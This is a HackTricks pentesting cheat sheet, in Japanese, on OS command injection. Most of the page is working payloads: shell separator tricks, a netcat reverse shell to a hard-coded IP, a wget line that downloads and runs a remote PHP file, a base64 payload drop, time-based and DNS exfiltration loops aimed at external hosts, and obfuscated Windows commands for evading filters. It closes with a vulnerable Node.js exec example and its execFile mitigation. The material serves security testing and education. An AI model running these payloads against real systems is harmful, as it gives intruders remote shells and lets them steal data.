hacktricks/src/pentesting-web/command-injection.md

6.0 KiB
Raw Blame History

Command Injection

{{#include ../banners/hacktricks-training.md}}

command Injectionとは何か?

A command injectionにより、攻撃者はアプリケーションをホストしているサーバ上で任意のOSコマンドを実行できます。その結果、アプリケーションとその全データが完全に侵害される可能性があります。これらのコマンドの実行により、攻撃者はアプリケーションの環境や基盤となるシステムへの不正アクセスや制御を得ることが一般的に可能になります。

コンテキスト

入力がどこに挿入されているかによって、コマンドの前にクォートされたコンテキストを終了する"' を使って)必要がある場合があります。

Command Injection/Execution

#Both Unix and Windows supported
ls||id; ls ||id; ls|| id; ls || id # Execute both
ls|id; ls |id; ls| id; ls | id # Execute both (using a pipe)
ls&&id; ls &&id; ls&& id; ls && id #  Execute 2º if 1º finish ok
ls&id; ls &id; ls& id; ls & id # Execute both but you can only see the output of the 2º
ls %0A id # %0A Execute both (RECOMMENDED)
ls%0abash%09-c%09"id"%0a   # (Combining new lines and tabs)

#Only unix supported
`ls` # ``
$(ls) # $()
ls; id # ; Chain commands
ls${LS_COLORS:10:1}${IFS}id # Might be useful

#Not executed but may be interesting
> /var/www/html/out.txt #Try to redirect the output to a file
< /etc/passwd #Try to send some input to the command

Limition バイパス

もし linux マシン内で任意のコマンド を実行しようとしているなら、これらのバイパスを読むと興味があるでしょう:

{{#ref}} ../linux-hardening/bypass-bash-restrictions/ {{#endref}}

vuln=127.0.0.1 %0a wget https://web.es/reverse.txt -O /tmp/reverse.php %0a php /tmp/reverse.php
vuln=127.0.0.1%0anohup nc -e /bin/bash 51.15.192.49 80
vuln=echo PAYLOAD > /tmp/pay.txt; cat /tmp/pay.txt | base64 -d > /tmp/pay; chmod 744 /tmp/pay; /tmp/pay

パラメータ

以下は code injection や類似の RCE 脆弱性の影響を受ける可能性がある上位25のパラメータです出典: link:

?cmd={payload}
?exec={payload}
?command={payload}
?execute{payload}
?ping={payload}
?query={payload}
?jump={payload}
?code={payload}
?reg={payload}
?do={payload}
?func={payload}
?arg={payload}
?option={payload}
?load={payload}
?process={payload}
?step={payload}
?read={payload}
?function={payload}
?req={payload}
?feature={payload}
?exe={payload}
?module={payload}
?payload={payload}
?run={payload}
?print={payload}

Time based data exfiltration

データ抽出1文字ずつ

swissky@crashlab▸ ~ ▸ $ time if [ $(whoami|cut -c 1) == s ]; then sleep 5; fi
real    0m5.007s
user    0m0.000s
sys 0m0.000s

swissky@crashlab▸ ~ ▸ $ time if [ $(whoami|cut -c 1) == a ]; then sleep 5; fi
real    0m0.002s
user    0m0.000s
sys 0m0.000s

DNS による data exfiltration

ツール https://github.com/HoLyVieR/dnsbin をベースにしており、dnsbin.zhack.ca にもホストされています。

1. Go to http://dnsbin.zhack.ca/
2. Execute a simple 'ls'
for i in $(ls /) ; do host "$i.3a43c7e4e57a8d0e2057.d.zhack.ca"; done
$(host $(wget -h|head -n1|sed 's/[ ,]/-/g'|tr -d '.').sudo.co.il)

DNS based data exfiltration をチェックするオンラインツール:

  • dnsbin.zhack.ca
  • pingb.in

Filtering bypass

Windows

powershell C:**2\n??e*d.*? # notepad
@^p^o^w^e^r^shell c:**32\c*?c.e?e # calc

Linux

{{#ref}} ../linux-hardening/bypass-bash-restrictions/ {{#endref}}

Node.js child_process.execexecFile

JavaScript/TypeScript のバックエンドを監査する際、Node.js の child_process API をよく目にします。

// Vulnerable: user-controlled variables interpolated inside a template string
const { exec } = require('child_process');
exec(`/usr/bin/do-something --id_user ${id_user} --payload '${JSON.stringify(payload)}'`, (err, stdout) => {
/* … */
});

exec()shell (/bin/sh -c) を起動するため、shell に特別な意味を持つ文字(バッククォート、;&&|$()、…)がユーザー入力を文字列に連結した際に command injection を引き起こします。

緩和策: execFile() を使用する(または spawn()shell オプションなしで使用)し、各引数を配列の別要素として渡すことで shell を介さないようにする:

const { execFile } = require('child_process');
execFile('/usr/bin/do-something', [
'--id_user', id_user,
'--payload', JSON.stringify(payload)
]);

Real-world case: Synology Photos ≤ 1.7.0-0794 は、認証不要の WebSocket イベントを介して攻撃者が制御するデータが id_user に配置され、その後 exec() 呼び出しに埋め込まれて RCE を達成しましたPwn2Own Ireland 2024

Brute-Force 検出リスト

{{#ref}} https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/command_injection.txt {{#endref}}

参考

{{#include ../banners/hacktricks-training.md}}